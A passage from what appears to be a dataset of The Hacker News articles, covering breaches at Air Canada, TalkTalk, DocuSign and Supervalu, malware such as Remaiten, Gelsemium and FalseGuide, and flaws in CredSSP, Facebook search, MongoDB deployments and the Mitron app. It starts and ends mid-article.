The exposed information contains basic information such as customers' names, email addresses, phone numbers, and other information they have added to their profiles.
Passport Numbers Exposed in Air Canada Data Breach
However, what's worrisome?
Hackers could have also accessed additional data including customer's passport number, passport expiration date, passport country of issuance and country of residence, Aeroplan number, known traveler number, NEXUS number, gender, date of birth, and nationality, if users had this information saved in their profile on the Air Canada mobile app.
The airline assured its customers that credit card information saved to their profile was ""encrypted and stored in compliance with security standards set by the payment card industry or PCI standards,"" and therefore, are protected.
However, Air Canada still recommended affected customers to always monitor their credit card transactions and contact their financial services provider immediately if they found any unusual or unauthorized activity.
Reset Your Password
The company estimates about 1% of its 1.7 million people—or about 20,000 users in total—who use its mobile app may have been affected by the security breach.
Although currently, it is not clear how the data breach occurred, if it was a direct breach of Air Canada's systems, or if it was due to the reuse of passwords from other sites, the airline encourages users to reset their passwords using improved password guidelines, which says passwords should be at least 10 characters long and contain one symbol.
However, as a precaution, the airline has locked down all 1.7 million accounts until all of its customers—even those whose information was not exposed in the breach—change their passwords.
Air Canada has contacted potentially affected customers directly by email starting August 29 to tell them if their account has potentially been accessed by hackers improperly.
Hola — A widely popular Free VPN service used as a Giant Botnet,https://thehackernews.com/2015/05/hola-widely-popular-free-vpn-service.html,"The bandwidth of Millions of users of a popular free VPN service is being sold without their knowledge in an attempt to cover the cost of its free service, which could result in a vast botnet-for-sale network.
""Hola,"" a free virtual private network, is designed to help people abroad watch region restricted shows like American Netflix, and other streaming United States media.
Hola is selling users' bandwidth:
Hola is easy-to-use browser plugin available in the Google Chrome Store with currently more than 6 Million downloads. But, unfortunately, Hola could be used by hackers to maliciously attack websites, potentially putting its users at risk of being involved in illegal or abusive activities.
Hola uses a peer-to-peer system to route users' traffic. So, if you are in Denmark and wants to watch a show from America, you might be routed through America-based user's Internet connections.
However, Hola is not leaving a chance to make money out of a free service. It has been selling access to users' bandwidth for profit to a third-party service called Luminati, which then re-sells the connections, Hola founder Ofer Vilenski confirmed.
Luminati is one of the world's largest VPN networks that lets users buy access to the Hola network for a fee, in case if users need a secure way to route commercial traffic without revealing their identity.
Giant Botnet
This simply means any user who makes use of the free version of Hola is having their connection sold without even their knowledge, as Motherboard says, ""turning you and other Hola users into a node of what could be described as a voluntary botnet.""
This isn't known until 8chan message board administrator Fredrick Brennan posted a message about the service, claiming Luminati and Hola users' computers have been used within a botnet to attack and take down his website.
Using Hola and Luminati services to take down websites:
Earlier this week Brennan website was attacked by thousands of ""legitimate-looking POST requests"" within 30 seconds, ""representing a 100x spike over peak traffic and crashing PHP-FPM,"" Brennan wrote in a blog post.
This denial of service (DoS) sort of attack was actually originated from a well-known spammer called ""Bui"", who later told Brennan that he had made use of Hola's Luminati service to carry out the attack against his web site.
Here's What Hola want's to say:
Hola's site explains in Faq that the service might be used for ""commercial"" purposes, but there was no mention of Luminati, which has been working with the company since at least October 2914. However, Hola updated its FAQ with a fuller explanation later.
""Hola is a managed and supervised network and thus any illegal activity such as CP, etc. would be reported to the authorities with the real IP of the user,"" the company wrote.
Yet that wouldn't prevent users from getting initially suspected as criminal hackers.
Vilenski said that the explanation about the service was actually there in a ""different form,"" pointing to the old FAQ, which states, ""if you would like to use Hola for commercial use contact us at business@hola.org for a quote.""
However, Vilenski himself admitted that most of the Hola users are probably not aware of it. According to him, it is not because the company is trying not to show its users, but it is because most of the users just don't care about it. ""They want a good service, it works well, and it does not screw them up,"" he added.
This again shows that if there is something free, there is often a catch. No doubt, free services attract everyone, but spending few dollars a month on VPNs could safeguard you from various online threats. Also, it's good practice to read details before installing extensions or services.
Advanced Malware targeting Internet of the Things and Routers,https://thehackernews.com/2016/03/internet-of-thing-malware.html,"Anything connected to the Internet could be hacked and so is the Internet of Things (IoTs).
The market fragmentation of IoTs or Internet-connected devices is a security nightmare, due to poor security measures implemented by their vendors.
Now, the researchers at security firm ESET have discovered a piece of Malware that is targeting embedded devices such as routers, and other connected devices like gateways and wireless access points, rather than computers or smartphones.
Dubbed KTN-Remastered or KTN-RM, the malware is a combination of both Tsunami (or Kaiten) as well as Gafgyt.
Tsunami is a well-known IRC (Internet Relay Chat) bot used by miscreants for launching Distributed Denial of Service (DDoS) attacks while Gafgyt is used for Telnet scanning.
KTN-RM, which researcher dubbed 'Remaiten,' features an improved spreading mechanism by carrying downloader executable binaries for embedded platforms and other connected devices.
How Does the Linux Malware Work?
The malware first performs Telnet scanning to look for routers and smart devices. Once the connection is made, the malware tries to guess the login credentials in an effort to take over weakly-secured devices.
If it successfully logs in, the malware will issue a shell command to download bot executable files for multiple system architectures before running them on the compromised networking kit.
""This is a simple but noisy way of ensuring that the new victim gets infected because it is likely that one of the binaries is for the current platform,"" explained ESET Malware Researcher Michal Malík. ""It targets mainly those with weak login credentials.""
The malware, version 2.0, also has a welcome message for those who might try to neutralise its threat, containing a reference to the Malware Must Die blog.
Perhaps it is a way to take revenge, as Malware Must Die has published extensive details about Gafgyt, Tsunami and other members of this Malware family.
For more technical details about KTN-RM or Remaiten, you can head on to ESET's official blog post published Wednesday.
NoxPlayer Supply-Chain Attack is Likely the Work of Gelsemium Hackers,https://thehackernews.com/2021/06/noxplayer-supply-chain-attack-is-likely.html,"A new cyber espionage group named Gelsemium has been linked to a supply chain attack targeting the NoxPlayer Android emulator that was disclosed earlier this year.
The findings come from a systematic analysis of multiple campaigns undertaken by the APT crew, with evidence of the earliest attack dating back all the way to 2014 under the codename Operation TooHash based on malware payloads deployed in those intrusions.
""Victims of these campaigns are located in East Asia as well as the Middle East and include governments, religious organizations, electronics manufacturers and universities,"" cybersecurity firm ESET said in an analysis published last week.
""Gelsemium's whole chain might appear simple at first sight, but the exhaustive configurations, implanted at each stage, modify on-the-fly settings for the final payload, making it harder to understand.""
Targeted countries include China, Mongolia, North and South Korea, Japan, Turkey, Iran, Iraq, Saudi Arabia, Syria, and Egypt.
Since its origins in the mid-2010s, Gelsemium has been found employing a variety of malware delivery techniques ranging from spear-phishing documents exploiting Microsoft Office vulnerabilities (CVE-2012-0158) and watering holes to a remote code execution flaw in Microsoft Exchange Server — likely CVE-2020-0688, which was addressed by the Windows maker in June 2020 — to deploy the China Chopper web shell.
According to ESET, Gelsemium's first stage is a C++ dropper named ""Gelsemine,"" which deploys a loader ""Gelsenicine"" onto the target system, which, in turn, retrieves and executes the main malware ""Gelsevirine"" that's capable of loading additional plug-ins provided by the command-and-control (C2) server.
The adversary is said to have been behind a supply chain attack aimed at BigNox's NoxPlayer, in a campaign dubbed ""Operation NightScout,"" in which the software's update mechanism was compromised to install backdoors such as Gh0st RAT and PoisonIvy RAT to spy on its victims, capture keystrokes, and gather valuable information.
""Victims originally compromised by that supply chain attack were later being compromised by Gelsemine,"" ESET researchers Thomas Dupuy and Matthieu Faou noted, with similarities observed between the trojanized versions of NoxPlayer and Gelsemium malware.
What's more, another backdoor called Chrommme, which was detected on an unnamed organization's machine also compromised by the Gelsemium group, used the same C2 server as that of Gelsevirine, raising the possibility that the threat actor may be sharing the attack infrastructure across its malware toolset.
""The Gelsemium biome is very interesting: it shows few victims (according to our telemetry) with a vast number of adaptable components,"" the researchers concluded. ""The plug-in system shows that developers have deep C++ knowledge.""
"TalkTalk Admits Customer Data Breach, warns of Scam Calls",https://thehackernews.com/2015/02/TalkTalk-hack-data-breach.html,"TalkTalk, one of the biggest UK-based phone, TV and Internet service provider with 4 million customers, has admitted it suffered a major Data Breach.
TalkTalk said customer information was accessed after a breach at a third-party company, in which names, addresses, phone numbers and TalkTalk account numbers have been stolen.
According to the report, TalkTalk customers began reporting problems on the TalkTalk forums late last year. Whereas, in some cases, hackers used customer details to scam bank information from the victims.
TalkTalk has confirmed that ""a small, but nonetheless significant"" number of customers have had their account details compromised by hackers, claiming to be from TalkTalk in order to trick them into handing over their banking details.
""At TalkTalk we take our customers' security very seriously and we take numerous measures to help keep our customers safe,"" TalkTalk spokesperson said in a statement. ""Yet sadly in every sector, criminal organisations using phone and email scams are on the rise.""
""As part of our ongoing approach to security we continually test our systems and processes ... following further investigation into these reports, we have now become aware that some limited, non-sensitive information about some customers could have been illegally accessed in violation of our security procedures.""
So far, it isn't clear that how many TalkTalk customers' data have been breached, but the company remains confident and reassure its customers that ""no sensitive data"", like a customer's date of birth, bank or credit card details has been compromised, and also that no TalkTalk Business customers are affected by the breach.
TalkTalk says it has taken ""urgent and serious steps"" to secure its systems and, meanwhile, warns its customers to be wary of any suspected phone or email correspondence purporting to be from TalkTalk.
A TalkTalk customer, Graeme Smith from County Durham spoke to the Guardian, reporting that the cyber criminals were able to steal almost £3,000 out of his Santander bank account. Smith said it was too late when he realised there was a problem.
The company also says that it has begun legal action against those third-party that had contacted the affected customers to reveal their banking details.
[POC] Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37,https://thehackernews.com/2012/03/poc-buffer-overflow-vulnerability-in.html,"Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37
Ucha Gobejishvili (longrifle0x) from The Vulnerability Laboratory Research Team discover Buffer Overflow Vulnerability in GOM Media Player v. 2.1.37. GOM Player (Gretech Online Movie Player) is a 32/64-bit media player for Microsoft Windows, distributed by the Gretech Corporation of South Korea.
A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity.
In this case, The vulnerability can be exploited by local or remote attackers and Vulnerable module is GomU+0x125cb7.
Proof of Concept:
1) Download & open the software client
2) Click open ==> Url..
3) Put vulnerability code
4) now you will see result
In buffer overflow attacks, the extra data may contain codes designed to trigger actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information.
DocuSign Data Breach Led to Targeted Email Malware Campaign,https://thehackernews.com/2017/05/DocuSign-data-breach.html,"While we all were busy in the WannaCry ransomware menace, two separate data breaches have been reported, one in DocuSign, a major provider of electronic signature technology, and another in BELL, Canada's largest telecommunications company.
In a notice on its website on Tuesday, DocuSign confirmed a breach at one of its email systems when investigating the cause of an increase in DocuSign-impersonating phishing emails.
""A malicious third party had gained temporary access to a separate, non-core system that allows us to communicate service-related announcements to users via email,"" DocuSign said in the announcement.
What Happened?
An unknown hacker or group of hackers managed to breach one of the electronic signature technology provider's email systems and steal a database containing the email addresses of DocuSign customers.
The attackers then used the stolen data to conduct an extensive phishing campaign to target the DocuSign's users over the past week.
The phishing email masqueraded as documents sent from another company with the subject line ""Completed *company name* – Accounting Invoice *number* Document Ready for Signature,"" needing a digital signature from the recipient.
The emails, sent from domains including dse@docus.com, included a downloadable Microsoft Word document, which when clicked, installs ""macro-enabled-malware"" on the victim's computers.
What type of information?
The company said only email addresses of its customers had been accessed in the breach.
However, DocuSign assured its customers that no names, physical addresses, passwords, social security numbers, credit card information or any other information had been accessed by the attackers.
""No content or any customer documents sent through DocuSign's eSignature system was accessed; and DocuSign's core eSignature service, envelopes and customer documents, and data remain secure,"" the company stressed.
How many victims?
The number of victims affected by the phishing campaign has not been confirmed, but DocuSign encourages its customers to use the DocuSign Trust Center to help them protect themselves and their employees from phishing attacks.
""Right now we are still acting on the results of our ongoing investigation and cannot comment on those details,"" the company said.
What is DocuSign doing?
In an attempt to protect its customers, DocuSign has immediately restricted unauthorized access to its system and placed further security controls in place to hardened the security of its systems.
The company is also actively working with law enforcement authorities on the investigation of this matter.
What should DocuSign customers do?
DocuSign recommended its users to delete any email with the following subject line:
Completed: [domain name] – Wire transfer for recipient-name Document Ready for Signature
Completed: [domain name/email address] – Accounting Invoice [Number] Document Ready for Signature.
If you receive any suspicious email, you should forward it to the company's spam address, advised DocuSign.
Also, if the email looks like it has come from DocuSign, just do not respond to that email or click on any link provided in the message.
Instead, access your documents directly by visiting DocuSign official website, and entering the unique security code provided at the bottom of every legit DocuSign email.
The company also informed its users that DocuSign never asks recipients to open any PDF, Office document or ZIP file in an email. Last but not the least, always make sure your antivirus software is up-to-date.
CredSSP Flaw in Remote Desktop Protocol Affects All Versions of Windows,https://thehackernews.com/2018/03/credssp-rdp-exploit.html,"A critical vulnerability has been discovered in Credential Security Support Provider protocol (CredSSP) that affects all versions of Windows to date and could allow remote attackers to exploit RDP and WinRM to steal data and run malicious code.
CredSSP protocol has been designed to be used by RDP (Remote Desktop Protocol) and Windows Remote Management (WinRM) that takes care of securely forwarding credentials encrypted from the Windows client to the target servers for remote authentication.
Discovered by researchers at Cybersecurity firm Preempt Security, the issue (CVE-2018-0886) is a logical cryptographic flaw in CredSSP that can be exploited by a man-in-the-middle attacker with Wi-Fi or physical access to the network to steal session authentication data and perform a Remote Procedure Call attack.
When a client and server authenticate over RDP and WinRM connection protocols, a man-in-the-middle attacker can execute remote commands to compromise enterprise networks.
""An attacker which have stolen a session from a user with sufficient privileges could run different commands with local admin privileges. This is especially critical in case of domain controllers, where most Remote Procedure Calls (DCE/RPC) are enabled by default,"" says Yaron Zinar, lead security researcher for Preempt.
""This could leave enterprises vulnerable to a variety of threats from attackers including lateral movement and infection on critical servers or domain controllers.""
Since RDP is the most popular application to perform remote logins and almost all enterprise customers are using RDP, it makes most networks vulnerable to this security issue.
Preempt Researchers discovered and reported this previously unknown remote code execution vulnerability to Microsoft in August last year, but the tech giant issued a fix for the protocol just today as part of its Patch Tuesday release—that's almost after 7 months of reporting.
To defend yourself and your organizations against the CredSSP exploit, users are recommended to patch their workstations and servers using available updates from the Microsoft.
Though researchers also warned that patching alone is not sufficient to prevent this attack, IT professionals are also required to make some configuration to apply the patch and be protected.
Blocking the relevant application ports including RDP and DCE/RPC would also thwart the attack, but researchers say this attack could even be implemented in different ways, using different protocols.
Therefore, to better protect your network, it is a good idea to decrease the use of privileged account as much as possible and instead use non-privileged accounts whenever applicable.
As part of March 2018 Patch Tuesday, Microsoft has also released security patches for its other products, including Microsoft IE and Edge browser, Windows OS, Microsoft Office, PowerShell, Core ChakraCore, as well as Adobe Flash player.
Beware! New Android Malware Infected 2 Million Google Play Store Users,https://thehackernews.com/2017/04/android-malware-playstore.html,"Initially thought to be 600,000 users, the number of Android users who have mistakenly downloaded and installed malware on their devices straight from Google Play Store has reached 2 Million.
Yes, about 2 Million Android users have fallen victim to malware hidden in over 40 fake companion guide apps for popular mobile games, such as Pokémon Go and FIFA Mobile, on the official Google Play Store, according to security researchers from Check Point.
Dubbed FalseGuide by the Check Point researchers, the malware creates a ""silent botnet out of the infected devices"" to deliver fraudulent mobile adware and generate ad revenue for cybercriminals.
Nearly 2 Million Android Users Infected!
While initially it was believed that the oldest instance of FalseGuide was uploaded to the Google Play in February and made its way onto over 600,000 devices within two months, further in-depth analysis by researchers revealed more infected apps which date back to November 2016.
""Since April 24, when the article below was first published, Check Point researchers learned that the FalseGuide attack is far more extensive than originally understood,"" Check Point researchers wrote in a blog post.
""The apps were uploaded to the app store [Google Play Store] as early as November 2016, meaning they hid successfully for five months, accumulating an astounding number of downloads.""
Russian connection with FalseGuide
Check Point researchers discovered five additional apps containing the FalseGuide malware on Google Play Store, developed by ""Anatoly Khmelenko"" (translated from Russian Анатолий Хмеленко).
Also, the first batch of malicious apps was submitted under the Russian names of two fake developers, Sergei Vernik and Nikolai Zalupkin, which suggests the malware is of Russian origin.
FalseGuide attempts to turn infected devices into a botnet that could allow its operator to control the devices without the knowledge of the device owners.
Here's How FalseGuide Works:
While downloading to the victim's phone, FalseGuide requests administrative permissions to the device in an attempt to avoid being deleted by the user.
The malware then registers itself with Firebase Cloud Messaging – a cross-platform messaging service that allows app developers to send messages and notifications.
Once subscribed to this service, FalseGuide can allow the attackers to send messages containing links to additional malware and install them to the infected device, enabling attackers to display illegitimate pop-up ads out of context and generate revenue.
Depending on their objectives, the attackers could also inject highly malicious code into an infected device to root it, conduct a Distributed Denial of Service (DDoS) attack, or even penetrate private networks.
Google Removed the Malware hidden Apps, but are you Clean?
Check Point has provided a full list of malicious apps hiding FalseGuide, which posed as guides for FIFA Mobile, Criminal Case, Super Mario, Subway Surfers, Pokemon Go, Lego Nexo Knights, Lego City My City, Ninjago Tournament, Rolling Sky, Amaz3ing Spider-Man, Drift Zone 2, Dream League Soccer, and many more.
Check Point researchers notified Google about FalseGuide in February, after which the company silently removed the malware apps from the Play Store.
But despite being removed, the malicious apps are likely still active on a number of devices, leaving Android users open to cyber attacks.
""Mobile botnets are a growing trend since early last year, growing in both sophistication and reach,"" CheckPoint said. ""This type of malware manages to infiltrate Google Play due to the non-malicious nature of the first component, which only downloads the actual harmful code.""
How to Protect yourself against such Malware
There are standard protection measures you need to follow to remain unaffected:
Always download apps which are from trusted and verified developers and stick to trusted sources, like Google play Store and the Apple App Store.
Always verify app permissions before installing apps. If any app is asking more than what it is meant for, just do not install it.
Keep a good antivirus app on your device that can detect and block such malware before it can infect your device. Always keep the app up-to-date.
Do not download apps from third party source. Although in this case, the app is being distributed through the official Play Store, most often such malware are distributed via untrusted third-party app stores.
Avoid unknown and unsecured Wi-Fi hotspots and Keep your Wi-Fi turned OFF when not in use.
Be careful which apps you give administrative rights to. Admin rights are powerful and can give an app full control of your device.
Never click on links in SMS or MMS sent to your mobile phone. Even if the email looks legit, go directly to the website of origin and verify any possible updates.
Grocery Stores 'Supervalu' and 'Albertsons' Hacked for Credit Card Data,https://thehackernews.com/2014/08/grocery-stores-supervalu-and-albertsons_17.html,"Albertson's and SuperValu - Two nation's most popular supermarket store chains announced last weekend that a data breach may have revealed the credit and debit card information of their customers at a number of grocery store locations in more than 18 states.
Minnesota-based Supervalu announced that an unknown number of its customers who used their payment cards in around 180 stores between June 22 and July 17 may have had payment card data compromised by attackers who gained access to the Supervalu computer network that processes card transactions.
The affected information may includes names, payment card numbers, expiration dates, and other numerical information from cards used at POS devices.
""The Company has not determined that any such cardholder data was in fact stolen by the intruder, and it has no evidence of any misuse of any such data, but is making this announcement out of an abundance of caution,"" SuperValu said in a statement.
The massive data breach impacted Supervalu's other brands operating under the names Cub Foods, Farm Fresh, Hornbacher's, Shop 'n Save, and Shoppers Food and Pharmacy in various parts of the country, including several in Minnesota, Virginia, Illinois, Missouri, Maryland and North Carolina.
In addition to Supervalu, the breach also hit the Albertsons, Acme Markets, Jewel-Osco, Shaw's and Star Markets brands in about 24 states.
AB Acquisition LLC – the parent company of Albertsons, ACME Markets, Jewel-Osco, and Shaw's and Star Market – announced a similar breach on Thursday that, according to company, occurred between the same timeframe.
The company has notified the appropriate law enforcement agencies and is working with Supervalu, who it identifies as ""its third party IT services provider,"" to investigate the data breach.
""Third-party data forensics experts are supporting an ongoing investigation. AB Acquisition has not determined that any cardholder data was in fact stolen, and currently it has no evidence of any misuse of any such data,"" AB Acquisition LLC said in a statement.
According to AB Acquisition LLC, Albertsons stores in Southern California, Idaho, Montana, North Dakota, Nevada, Oregon, Washington, Wyoming and Southern Utah were impacted by this data breach. However, stores in Arizona, Arkansas, Colorado, Florida, Louisiana, New Mexico, Texas and our two Super Saver Foods Stores in Northern Utah were not affected.
Moreover, ACME Markets in Pennsylvania, Maryland, Delaware and New Jersey; Jewel-Osco stores in Iowa, Illinois and Indiana; and Shaw's and Star Markets stores in Maine, Massachusetts, Vermont, New Hampshire and Rhode Island were all affected by this incident.
The companies did not revealed how the card data were stolen, but given the recent outbreak of point-of-sale (POS) hacks at the third-largest U.S. Retailer Target and other major retailers such as Neiman Marcus, Michaels Store, the POS systems would be a likely attack vector.
Still, it is unclear exactly how many number of payment cards were impacted in the data breaches, but both companies are taking necessary steps to notify the affected customers, as well as offering them one year of free credit monitoring services, as of the data breach standard.
SuperValu said in a statement that the company ""took immediate steps to secure the affected part of its network. Supervalu believes the intrusion has been contained and is confident that its customers can safely use their credit and debit cards in its stores.""
Both companies say they have no evidence that stolen payment card information is being misused at this time, but if the data was indeed stolen, it likely would turn up on underground markets for sale.
Another Facebook Bug Could Have Exposed Your Private Information,https://thehackernews.com/2018/11/facebook-vulnerability-hack.html,"Another security vulnerability has been reported in Facebook that could have allowed attackers to obtain certain personal information about users and their friends, potentially putting the privacy of users of the world's most popular social network at risk.
Discovered by cybersecurity researchers from Imperva, the vulnerability resides in the way Facebook search feature displays results for entered queries.
According to Imperva researcher Ron Masas, the page that displays search results includes iFrame elements associated with each outcome, where the endpoint URLs of those iFrames did not have any protection mechanisms in place to protect against cross-site request forgery (CSRF) attacks.
It should be noted that the newly reported vulnerability has already been patched, and unlike previously disclosed flaw in Facebook that exposed personal information of 30 million users, it did not allow attackers to extract information from mass accounts at once.
How Does the Facebook Search Vulnerability Work?
To exploit this vulnerability, all an attacker needs to do is simply tricking users into visiting a malicious site on their web browser where they have already logged into their Facebook accounts.
The malicious site contains a javascript code that will get executed in the background as soon as the victim clicks anywhere on that page.
""For this attack to work we need to trick a Facebook user to open our malicious site and click anywhere on the site, (this can be any site we can run JavaScript on) allowing us to open a popup or a new tab to the Facebook search page, forcing the user to execute any search query we want,"" Masas explained in a blog post published today.
As demonstrated by Masas in the video shown below, the JavaScript code opens a new tab or window with a Facebook URL that runs certain predefined search queries and measures the result to extract targeted information.
Searching something on Facebook seems less lucrative, especially when the exploit code returns the result in just yes or no.
""The attack actually leaks the number of search results for any search query on the currently logged Facebook account. The most basic usage is to make boolean queries like 'photos of me from Iceland',"" Masas told The Hacker News.
But if used correctly, Facebook's search feature could be exploited to extract sensitive information related to your Facebook account, such as checking:
If you have a friend with a specific name or a keyword in his/her name
If you like a particular page or are a member of a specific group
If you have a friend who likes a particular page
If you have taken photos in a certain location or country
If you have ever posted a photo taken at certain places/countries
If you have ever posted an update on your timeline containing a specific text/keyword
If you have Islamic friends
And so on… any custom query you can come up with.
""This process can be repeated without the need for new popups or tabs to be open since the attacker can control the location property of the Facebook window,"" Masas added. ""This is especially dangerous for mobile users, since the open tab can easily get lost in the background, allowing the attacker to extract the results for multiple queries, while the user is watching a video or reading an article on the attacker's site.""
In short, the vulnerability exposed interests and activities of targeted users and their friends even if their privacy settings are set in a way that this information can only be visible to them or their friends.
Imperva responsibly reported the bug to Facebook through the company's vulnerability disclosure program in May 2018, and the social network giant resolved the issue days later by adding CSRF protections.
Almost three months ago, Masas also reported an impressive web browser vulnerability that exposed everything other web platforms, like Facebook and Google, knows about you. He also released a proof of concept exploit of the bug.
"Apple Devices Hacked by 'Oleg Pliss', held to Ransom",https://thehackernews.com/2014/05/apple-devices-hacked-by-oleg-pliss-held.html,"From last few years Ransomware malwares are targeting Windows users Worldwide and experts predicted that it was just a matter of time until ransomware would hit mobile devices and other Desktop operating systems like Mac, iOS, Android etc.
A Few weeks back we reported about a Ransomware malware campaign which is targeting Android mobile users. Such Malware first try to trick users into downloading it and then demanding payment to restore user control of the device.
This morning reports came out that cybercriminals have targeted a large number of users of Apple's iCloud connected devices with a sophisticated Ransomware in Australia.
The owners of iPhone, Mac and iPads are finding their devices locked remotely through iCloud and a message originating in Apple's find my device service that states ""Device hacked by Oleg Pliss"".
One user wrote on Apple Support Forum, ""I went to check my phone and there was a message on the screen (it's still there) saying that my device(s) had been hacked by 'Oleg Pliss' and he/she/they demanded $100 USD/EUR (sent by paypal to lock404(at)hotmail.com) to return them to me.""
The Locked Devices are prompting to send up to US$100 to a Paypal account of the suspected hacker in order to have them unlocked. But we urge our users not to send money to the given account, as PayPal spokesman confirmed that, 'There's no PayPal account linked to hacker email addr and any customer who has sent money will be refunded'
This case is quite different because phones are not infected by any malicious application, but rather hackers allegedly hijacked Apple's 'Find My iPhone' feature, which allowed them to remotely lock iOS and Mac devices and send messages demanding ransom money.
It appears that Australian hackers are using compromised iCloud accounts, exposed in some recent security breaches and the hacked accounts were likely not using two-step verification. But those users who have set Passcode for a two-step verification on their Apple devices haven't fallen victim to this attack, because just account password will not be sufficient for hackers to gain device access.
Users can still recover their device by resetting the device in ""recovery mode"", but in this process you will lose all your apps and data stored on the device.
Apple has not yet officially commented on the issue but users are recommended to turn on two-step verification for their Apple ID with the directions available on Apple's support page.
"40,000 UnProtected MongoDB Databases Found on the Internet",https://thehackernews.com/2015/02/mongodb-database-hacking.html,"Nearly 40,000 organisations running MongoDB, a NoSQL high performance and cross-platform document-oriented database, are found to be unprotected and vulnerable to hackers.
Three students from University of Saarland in Germany at the Centre for IT Security – Kai Greshake, Eric Petryka and Jens Heyens – discovered that MongoDB databases running at TCP port 27017 as a service on several thousands of commercial web servers are easily accessible on the Internet.
MongoDB is an open-source database used by companies of all sizes, across all industries for a wide variety of applications. MongoDB is built for scalability, performance and high availability, scaling from single server deployments to large, complex multi-site architectures. By leveraging in-memory computing, MongoDB provides high performance for both reads and writes.
The German researchers said that they were able to get ""read and write access"" to the unsecured MongoDB databases without using any special hacking tools. They found 39,890 MongoDB databases openly available on the Internet, including one belongs to an unnamed French telecommunications company containing 8 Million customer's phone numbers and addresses.
""Anybody could retrieve and even alter several million items of customer data, including names, addresses, emails and credit card numbers,"" the university in Saarbruecken on the Franco-German border said in a statement.
Exploiting the loophole is incredibly easy, as an attacker only needs to run a port scan for TCP port 27017 on the victim's machine and finding all possible vulnerable servers on the Internet could be achieved within four hours by scanning the Internet using fastest TCP Port Scanner called, ""masscan"".
However, Shodan Search Engine makes the task even easier as it helps hackers to identify accessible MongoDB databases easily. Shodan has a database containing IP addresses with a list of services running and an easy-to-use filter mask.
The German researchers reported the issue to MongoDB as well as the French Data Protection Authority (CNIL) and the Federal Office for Information Security so that the affected database owners could be notified of the loophole.
MongoDB responded to the issue, saying ""MongoDB takes security very seriously."" Those who are affected by the issue should use latest installer for MongoDB which limits network access to localhost by default and also refer MongoDB Security Manual.
Exclusive – Any Mitron (Viral TikTok Clone) Profile Can Be Hacked in Seconds,https://thehackernews.com/2020/05/titok-mitron-app-hacking.html,"Mitron (means ""friends"" in Hindi), you have been fooled again!
Mitron is not really a 'Made in India' product, and the viral app contains a highly critical, unpatched vulnerability that could allow anyone to hack into any user account without requiring interaction from the targeted users or their passwords.
I am sure many of you already know what TikTok is, and those still unaware, it's a highly popular video social platform where people upload short videos of themselves doing things like lip-syncing and dancing.
The wrath faced by Chinese-owned TikTok from all directions—mostly due to data security and ethnopolitical reasons—gave birth to new alternatives in the market, one of which is the Mitron app for Android.
Mitron video social platform recently caught headlines when the Android app crazily gained over 5 million installations and 250,000 5-star ratings in just 48 days after being released on the Google Play Store.
Popped out of nowhere, Mitron is not owned by any big company, but the app went viral overnight, capitalizing on its name that is popular in India as a commonly used greeting by Prime Minister Narendra Modi.
Besides this, PM Modi's latest 'vocal for local' initiative to make India self-reliant has indirectly set up a narrative in the country to boycott Chinese services and products, and of course, #tiktokban and #IndiansAgainstTikTok hashtags trending due to TikTok vs. YouTube battle and CarryMinati roast video also rapidly increased the popularity of Mitron.
Any Mitron Users Account Can Be Hacked in Seconds
The insecurity that TikTok is a Chinese app and might have allegedly been abusing its users' data for surveillance, unfortunately, turned millions into signing up for less trusted and insecure alternative blindly.
The Hacker News learned that the Mitron app contains a critical and easy-to-exploit software vulnerability that could let anyone bypass account authorization for any Mitron user within seconds.
The security issue discovered by Indian vulnerability researcher Rahul Kankrale resides in the way app implemented 'Login with Google' feature, which asks users' permission to access their profile information via Google account while signing up but, ironically, doesn't use it or create any secret tokens for authentication.
In other words, one can log into any targeted Mitron user profile just by knowing his or her unique user ID, which is a piece of public information available in the page source, and without entering any password—as shown in a video demonstration Rahul shared with The Hacker News.
Mitron App Was Not Developed; Instead Bought For Just $34
Promoted as a homegrown competitor to TikTok, in separate news, it turns out that the Mitron app has not been developed from scratch; instead, someone purchased a ready-made app from the Internet, and simply rebranded it.
While reviewing the app's code for vulnerabilities, Rahul found that Mitron is actually a re-packaged version of the TicTic app created by a Pakistani software development company Qboxus who is selling it as a ready-to-launch clone for TikTok, musical.ly or Dubsmash like services.
In an interview with the media, Irfan Sheikh, CEO of Qboxus, said his company sells the source code, which the buyers are expected to customize.
""There is no problem with what the developer has done. He paid for the script and used it, which is okay. But, the problem is with people referring to it as an Indian-made app, which is not true, especially because they have not made any changes,"" Irfan said.
Besides Mitron's owner, more than 250 other developers have also purchased the TicTic app code since last year, potentially running a service that can be hacked using the same vulnerability.
Who is Behind the Mitron App? An Indian or a Pakistani?
Though the code has been developed by the Pakistani company, real identity of the person behind the Mitron app—TicTic at heart TikTok by face—has yet not been confirmed; however, some reports suggest it's owned by a former student of the Indian Institute of Technology (IIT Roorkee).
Rahul told The Hacker News that he tried responsibly reporting the flaw to the app owner but failed as the email address mentioned on the Google Play Store, the only point of available contact, is non-operational.
Besides this, the homepage for the web server (shopkiller.in), where the backend infrastructure of the app is hosted, is also blank.
Considering that the flaw actually resides in the TicTic app code and affects any other similar cloned service running out there, The Hacker News has reached out to Qboxus and disclosed details of the flaw before publishing this story.
We will update this article when we receive a response.
Is Mitron App Safe to Use?
In short, since:
the vulnerability has not yet been patched,
the owner of the app is unknown,
the privacy policy of the service doesn't exist, and
there are no terms of use,
... it's highly recommended to simply do not install or use the untrusted application.
If you're among those 5 million who have already created a profile with the Mitron app and granted it access to your Google profile, revoke it immediately.
Unfortunately, there's no way you can delete your Mitron account yourself, but the hacking of Mitron user profile would not severely impact unless you have at least a few thousand followers on the platform.
However, keeping an untrusted app installed on your smartphone is not a good idea and could put your data from other apps and sensitive information stored on it at risk, so users are advised to uninstall the app for good.
21-Year-Old Woman Charged With Hacking Selena Gomez's Email Account,https://thehackernews.com/2018/07/selena-gomez-email-hacking.html,"A 21-year-old New Jersey woman has been charged with hacking into the email accounts of pop star and actress Selena Gomez, stealing her personal photos, and then leaked them to the Internet.
Susan Atrach of Ridgefield Park was charged Thursday with 11 felony counts—five counts of identity theft, five counts of accessing and using computer data to commit fraud or illegally obtain money, property or data, and one count of accessing computer data without permission.
